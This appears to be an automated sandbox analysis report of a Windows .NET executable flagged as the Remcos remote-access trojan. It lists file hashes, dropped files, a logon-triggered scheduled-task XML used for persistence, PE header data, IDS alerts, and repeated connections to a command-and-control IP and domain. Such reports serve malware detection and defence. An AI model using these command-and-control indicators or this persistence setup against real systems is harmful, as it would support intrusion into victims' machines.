                          MD5:1330C80CAAC9A0FB172F202485E9B1E8
                          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                          Malicious:false
                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):2232
                          Entropy (8bit):5.3810236212315665
                          Encrypted:false
                          SSDEEP:48:lylWSU4xympgv4RIoUP7gZ9tK8NPZHUx7u1iMuge//ZPUyRs:lGLHxv2IfLZ2KRH6OugQs
                          MD5:C302AACE38872D542A3B5A890846D029
                          SHA1:0345FC88DE3074157EE4FFA7EAE1CB55F3861CEB
                          SHA-256:1DE041A51E56C8F3D18C0CD83012F258D801102E3E342175BEC16CDC8BBFFC03
                          SHA-512:CD7469BCDADA7431D72E6C1E3CC8FF022B2BEDF991E50371CE3E532B645A73000DDA9A8EBFA1E8F37B7D1EFD53484125492C36709CEF9B4B3B264577201B752D
                          Malicious:false
                          Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Users\user\Desktop\Nfi2yQDBda.exe
                          File Type:XML 1.0 document, ASCII text
                          Category:dropped
                          Size (bytes):1603
                          Entropy (8bit):5.126384339062234
                          Encrypted:false
                          SSDEEP:24:2di4+S2qhH1jy1m4UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtoaxvn:cgeHgYrFdOFzOzN33ODOiDdKrsuTouv
                          MD5:EA5A2A500AE814E6137CF81EDD1786C3
                          SHA1:397E7A07726D2867F5CACE125EA479120921ABBB
                          SHA-256:B5F745CF772275C983B08BD27FB1BA7266F6527EF623B3CA72774D4BE8D82DF0
                          SHA-512:8DBC2054488FAEB9F8C1BC463BA7416D4A454B45F5B60DED3E17E679F91302ADF30FAADDA40C79A4086ABADE4EDB1B84EFC422F8FA2530CBE7088804E6FFB7E6
                          Malicious:true
                          Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>.
                          Process:C:\Users\user\AppData\Roaming\xjXWSRbLn.exe
                          File Type:XML 1.0 document, ASCII text
                          Category:dropped
                          Size (bytes):1603
                          Entropy (8bit):5.126384339062234
                          Encrypted:false
                          SSDEEP:24:2di4+S2qhH1jy1m4UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtoaxvn:cgeHgYrFdOFzOzN33ODOiDdKrsuTouv
                          MD5:EA5A2A500AE814E6137CF81EDD1786C3
                          SHA1:397E7A07726D2867F5CACE125EA479120921ABBB
                          SHA-256:B5F745CF772275C983B08BD27FB1BA7266F6527EF623B3CA72774D4BE8D82DF0
                          SHA-512:8DBC2054488FAEB9F8C1BC463BA7416D4A454B45F5B60DED3E17E679F91302ADF30FAADDA40C79A4086ABADE4EDB1B84EFC422F8FA2530CBE7088804E6FFB7E6
                          Malicious:false
                          Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>.
                          Process:C:\Users\user\Desktop\Nfi2yQDBda.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):1164800
                          Entropy (8bit):7.4282001845546635
                          Encrypted:false
                          SSDEEP:24576:8zs840f0gGLrFSxQ8Y21mwSvOIRPV/7BpgB9:8zs8C1dmQ8XmwQbPV
                          MD5:80B1BD15B16559E4BF630C60F7819A84
                          SHA1:BCD2884BEE79FFBC87B63EC96B35478232DA4A05
                          SHA-256:F9B5A6BEFE0272CFA6FE717AC29A61D76BD340D1C564E179CB65975AC98B1F07
                          SHA-512:03E2A9E48C038D5786281D0C338898548C4809A98597AEF430A84E204AF9518286744D542BF47CDDFB5E6C605A3B513E50F9AF1DF5379A4337DA7C5A90C0CCB3
                          Malicious:true
                          Antivirus:
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 68%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a...............0.............b.... ........@.. ....................... ............@.....................................O.......................................p............................................ ............... ..H............text...h.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................B.......H........x..l.......7....~...B...........................................0.............o.....8.....o....t.......u.........,@..t......o....r...po....-..o....r...po....+......,....o.......+&.u...........,...t........o....(........o....:t......u........,...o......*...................0...........#........}.....#........}.....#........}.....#.....L.@}......}......}.....s....}.....s....}.....sG...}.....sM...}......}......}.....(.......(.......{....(.......{!...(.......{....(.......
                          Process:C:\Users\user\Desktop\Nfi2yQDBda.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):26
                          Entropy (8bit):3.95006375643621
                          Encrypted:false
                          SSDEEP:3:ggPYV:rPYV
                          MD5:187F488E27DB4AF347237FE461A079AD
                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                          Malicious:true
                          Preview:[ZoneTransfer]....ZoneId=0
                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Entropy (8bit):7.4282001845546635
                          TrID:
                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                          • Win32 Executable (generic) a (10002005/4) 49.78%
                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                          • Generic Win/DOS Executable (2004/3) 0.01%
                          • DOS Executable Generic (2002/1) 0.01%
                          File name:Nfi2yQDBda.exe
                          File size:1'164'800 bytes
                          MD5:80b1bd15b16559e4bf630c60f7819a84
                          SHA1:bcd2884bee79ffbc87b63ec96b35478232da4a05
                          SHA256:f9b5a6befe0272cfa6fe717ac29a61d76bd340d1c564e179cb65975ac98b1f07
                          SHA512:03e2a9e48c038d5786281d0c338898548c4809a98597aef430a84e204af9518286744d542bf47cddfb5e6c605a3b513e50f9af1df5379a4337da7c5a90c0ccb3
                          SSDEEP:24576:8zs840f0gGLrFSxQ8Y21mwSvOIRPV/7BpgB9:8zs8C1dmQ8XmwQbPV
                          TLSH:2F45183D29BD222BE175C3A78BDBE427F538986F3054ADA458D343A94346A4734C327E
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a...............0.............b.... ........@.. ....................... ............@................................
                          Icon Hash:00928e8e8686b000
                          Entrypoint:0x51da62
                          Entrypoint Section:.text
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Time Stamp:0xE3611A06 [Sun Nov 19 16:21:26 2090 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:4
                          OS Version Minor:0
                          File Version Major:4
                          File Version Minor:0
                          Subsystem Version Major:4
                          Subsystem Version Minor:0
                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                          Instruction
                          jmp dword ptr [00402000h]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IMPORT0x11da0e0x4f.text
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x11e0000x5ac.rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x1200000xc.reloc
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x11c1080x70.text
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          .text0x20000x11ba680x11bc00f002525ef5d572619ec3aec71f1bd5c2False0.8049860613986785data7.4333879216457275IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          .rsrc0x11e0000x5ac0x6006c8d52b5d9a3ddd24ef48d96ced50607False0.4244791666666667data4.110846705318121IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .reloc0x1200000xc0x200762119f7233fac1e82f6cbe18a74a903False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                          NameRVASizeTypeLanguageCountryZLIB Complexity
                          RT_VERSION0x11e0900x31cdata0.4396984924623116
                          RT_MANIFEST0x11e3bc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                          DLLImport
                          mscoree.dll_CorExeMain
                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                          2025-01-11T03:55:11.482436+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.74970269.174.98.4845682TCP
                          2025-01-11T03:55:33.885387+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.74983669.174.98.4845682TCP
                          2025-01-11T03:55:56.276669+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.74997669.174.98.4845682TCP
                          2025-01-11T03:56:18.681355+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.74997869.174.98.4845682TCP
                          2025-01-11T03:56:41.074547+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.74997969.174.98.4845682TCP
                          2025-01-11T03:57:03.512396+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.74998069.174.98.4845682TCP
                          2025-01-11T03:57:26.076513+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.74998169.174.98.4845682TCP
                          2025-01-11T03:57:48.480858+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.74998269.174.98.4845682TCP
                          2025-01-11T03:58:10.856140+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.74998369.174.98.4845682TCP
                          2025-01-11T03:58:33.231511+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.74998469.174.98.4845682TCP
                          2025-01-11T03:58:55.607671+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.74998569.174.98.4845682TCP
                          TimestampSource PortDest PortSource IPDest IP
                          Jan 11, 2025 03:54:50.081409931 CET4970245682192.168.2.769.174.98.48
                          Jan 11, 2025 03:54:50.086410046 CET456824970269.174.98.48192.168.2.7
                          Jan 11, 2025 03:54:50.086683035 CET4970245682192.168.2.769.174.98.48
                          Jan 11, 2025 03:54:50.109699011 CET4970245682192.168.2.769.174.98.48
                          Jan 11, 2025 03:54:50.114540100 CET456824970269.174.98.48192.168.2.7
                          Jan 11, 2025 03:55:11.482376099 CET456824970269.174.98.48192.168.2.7
                          Jan 11, 2025 03:55:11.482435942 CET4970245682192.168.2.769.174.98.48
                          Jan 11, 2025 03:55:11.482547045 CET4970245682192.168.2.769.174.98.48
                          Jan 11, 2025 03:55:11.487359047 CET456824970269.174.98.48192.168.2.7
                          Jan 11, 2025 03:55:12.498148918 CET4983645682192.168.2.769.174.98.48
                          Jan 11, 2025 03:55:12.503068924 CET456824983669.174.98.48192.168.2.7
                          Jan 11, 2025 03:55:12.503151894 CET4983645682192.168.2.769.174.98.48
                          Jan 11, 2025 03:55:12.506231070 CET4983645682192.168.2.769.174.98.48
                          Jan 11, 2025 03:55:12.511151075 CET456824983669.174.98.48192.168.2.7
                          Jan 11, 2025 03:55:33.885317087 CET456824983669.174.98.48192.168.2.7
                          Jan 11, 2025 03:55:33.885386944 CET4983645682192.168.2.769.174.98.48
                          Jan 11, 2025 03:55:33.885453939 CET4983645682192.168.2.769.174.98.48
                          Jan 11, 2025 03:55:33.890254021 CET456824983669.174.98.48192.168.2.7
                          Jan 11, 2025 03:55:34.888595104 CET4997645682192.168.2.769.174.98.48
                          Jan 11, 2025 03:55:34.893518925 CET456824997669.174.98.48192.168.2.7
                          Jan 11, 2025 03:55:34.893625021 CET4997645682192.168.2.769.174.98.48
                          Jan 11, 2025 03:55:34.897120953 CET4997645682192.168.2.769.174.98.48
                          Jan 11, 2025 03:55:34.901992083 CET456824997669.174.98.48192.168.2.7
                          Jan 11, 2025 03:55:56.276578903 CET456824997669.174.98.48192.168.2.7
                          Jan 11, 2025 03:55:56.276669025 CET4997645682192.168.2.769.174.98.48
                          Jan 11, 2025 03:55:56.276724100 CET4997645682192.168.2.769.174.98.48
                          Jan 11, 2025 03:55:56.281527996 CET456824997669.174.98.48192.168.2.7
                          Jan 11, 2025 03:55:57.295981884 CET4997845682192.168.2.769.174.98.48
                          Jan 11, 2025 03:55:57.300900936 CET456824997869.174.98.48192.168.2.7
                          Jan 11, 2025 03:55:57.300972939 CET4997845682192.168.2.769.174.98.48
                          Jan 11, 2025 03:55:57.304325104 CET4997845682192.168.2.769.174.98.48
                          Jan 11, 2025 03:55:57.309117079 CET456824997869.174.98.48192.168.2.7
                          Jan 11, 2025 03:56:18.681288004 CET456824997869.174.98.48192.168.2.7
                          Jan 11, 2025 03:56:18.681355000 CET4997845682192.168.2.769.174.98.48
                          Jan 11, 2025 03:56:18.681401014 CET4997845682192.168.2.769.174.98.48
                          Jan 11, 2025 03:56:18.686306953 CET456824997869.174.98.48192.168.2.7
                          Jan 11, 2025 03:56:19.688244104 CET4997945682192.168.2.769.174.98.48
                          Jan 11, 2025 03:56:19.693099976 CET456824997969.174.98.48192.168.2.7
                          Jan 11, 2025 03:56:19.699882030 CET4997945682192.168.2.769.174.98.48
                          Jan 11, 2025 03:56:19.699882030 CET4997945682192.168.2.769.174.98.48
                          Jan 11, 2025 03:56:19.704617977 CET456824997969.174.98.48192.168.2.7
                          Jan 11, 2025 03:56:41.072258949 CET456824997969.174.98.48192.168.2.7
                          Jan 11, 2025 03:56:41.074547052 CET4997945682192.168.2.769.174.98.48
                          Jan 11, 2025 03:56:41.074547052 CET4997945682192.168.2.769.174.98.48
                          Jan 11, 2025 03:56:41.079382896 CET456824997969.174.98.48192.168.2.7
                          Jan 11, 2025 03:56:42.094468117 CET4998045682192.168.2.769.174.98.48
                          Jan 11, 2025 03:56:42.099621058 CET456824998069.174.98.48192.168.2.7
                          Jan 11, 2025 03:56:42.099720001 CET4998045682192.168.2.769.174.98.48
                          Jan 11, 2025 03:56:42.105310917 CET4998045682192.168.2.769.174.98.48
                          Jan 11, 2025 03:56:42.110177994 CET456824998069.174.98.48192.168.2.7
                          Jan 11, 2025 03:57:03.512295008 CET456824998069.174.98.48192.168.2.7
                          Jan 11, 2025 03:57:03.512396097 CET4998045682192.168.2.769.174.98.48
                          Jan 11, 2025 03:57:03.520643950 CET4998045682192.168.2.769.174.98.48
                          Jan 11, 2025 03:57:03.525485992 CET456824998069.174.98.48192.168.2.7
                          Jan 11, 2025 03:57:04.681482077 CET4998145682192.168.2.769.174.98.48
                          Jan 11, 2025 03:57:04.686342001 CET456824998169.174.98.48192.168.2.7
                          Jan 11, 2025 03:57:04.686410904 CET4998145682192.168.2.769.174.98.48
                          Jan 11, 2025 03:57:04.691392899 CET4998145682192.168.2.769.174.98.48
                          Jan 11, 2025 03:57:04.696135998 CET456824998169.174.98.48192.168.2.7
                          Jan 11, 2025 03:57:26.076392889 CET456824998169.174.98.48192.168.2.7
                          Jan 11, 2025 03:57:26.076513052 CET4998145682192.168.2.769.174.98.48
                          Jan 11, 2025 03:57:26.081082106 CET4998145682192.168.2.769.174.98.48
                          Jan 11, 2025 03:57:26.085820913 CET456824998169.174.98.48192.168.2.7
                          Jan 11, 2025 03:57:27.092307091 CET4998245682192.168.2.769.174.98.48
                          Jan 11, 2025 03:57:27.097270966 CET456824998269.174.98.48192.168.2.7
                          Jan 11, 2025 03:57:27.097348928 CET4998245682192.168.2.769.174.98.48
                          Jan 11, 2025 03:57:27.101130962 CET4998245682192.168.2.769.174.98.48
                          Jan 11, 2025 03:57:27.105948925 CET456824998269.174.98.48192.168.2.7
                          Jan 11, 2025 03:57:48.480741024 CET456824998269.174.98.48192.168.2.7
                          Jan 11, 2025 03:57:48.480858088 CET4998245682192.168.2.769.174.98.48
                          Jan 11, 2025 03:57:48.480948925 CET4998245682192.168.2.769.174.98.48
                          Jan 11, 2025 03:57:48.485718966 CET456824998269.174.98.48192.168.2.7
                          Jan 11, 2025 03:57:49.482932091 CET4998345682192.168.2.769.174.98.48
                          Jan 11, 2025 03:57:49.488164902 CET456824998369.174.98.48192.168.2.7
                          Jan 11, 2025 03:57:49.488235950 CET4998345682192.168.2.769.174.98.48
                          Jan 11, 2025 03:57:49.492412090 CET4998345682192.168.2.769.174.98.48
                          Jan 11, 2025 03:57:49.497260094 CET456824998369.174.98.48192.168.2.7
                          Jan 11, 2025 03:58:10.856064081 CET456824998369.174.98.48192.168.2.7
                          Jan 11, 2025 03:58:10.856139898 CET4998345682192.168.2.769.174.98.48
                          Jan 11, 2025 03:58:10.856183052 CET4998345682192.168.2.769.174.98.48
                          Jan 11, 2025 03:58:10.861068964 CET456824998369.174.98.48192.168.2.7
                          Jan 11, 2025 03:58:11.863095999 CET4998445682192.168.2.769.174.98.48
                          Jan 11, 2025 03:58:11.868201017 CET456824998469.174.98.48192.168.2.7
                          Jan 11, 2025 03:58:11.868592978 CET4998445682192.168.2.769.174.98.48
                          Jan 11, 2025 03:58:11.918061972 CET4998445682192.168.2.769.174.98.48
                          Jan 11, 2025 03:58:11.922949076 CET456824998469.174.98.48192.168.2.7
                          Jan 11, 2025 03:58:33.230974913 CET456824998469.174.98.48192.168.2.7
                          Jan 11, 2025 03:58:33.231511116 CET4998445682192.168.2.769.174.98.48
                          Jan 11, 2025 03:58:33.231512070 CET4998445682192.168.2.769.174.98.48
                          Jan 11, 2025 03:58:33.236449003 CET456824998469.174.98.48192.168.2.7
                          Jan 11, 2025 03:58:34.233376980 CET4998545682192.168.2.769.174.98.48
                          Jan 11, 2025 03:58:34.239990950 CET456824998569.174.98.48192.168.2.7
                          Jan 11, 2025 03:58:34.240072966 CET4998545682192.168.2.769.174.98.48
                          Jan 11, 2025 03:58:34.243565083 CET4998545682192.168.2.769.174.98.48
                          Jan 11, 2025 03:58:34.249214888 CET456824998569.174.98.48192.168.2.7
                          Jan 11, 2025 03:58:55.606355906 CET456824998569.174.98.48192.168.2.7
                          Jan 11, 2025 03:58:55.607671022 CET4998545682192.168.2.769.174.98.48
                          Jan 11, 2025 03:58:55.607917070 CET4998545682192.168.2.769.174.98.48
                          Jan 11, 2025 03:58:55.612801075 CET456824998569.174.98.48192.168.2.7
                          TimestampSource PortDest PortSource IPDest IP
                          Jan 11, 2025 03:54:49.905081987 CET6523453192.168.2.71.1.1.1
                          Jan 11, 2025 03:54:50.056602955 CET53652341.1.1.1192.168.2.7
                          Jan 11, 2025 03:57:04.532358885 CET5759753192.168.2.71.1.1.1
                          Jan 11, 2025 03:57:04.680432081 CET53575971.1.1.1192.168.2.7
                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                          Jan 11, 2025 03:54:49.905081987 CET192.168.2.71.1.1.10x7509Standard query (0)decmainserver.webredirect.orgA (IP address)IN (0x0001)false
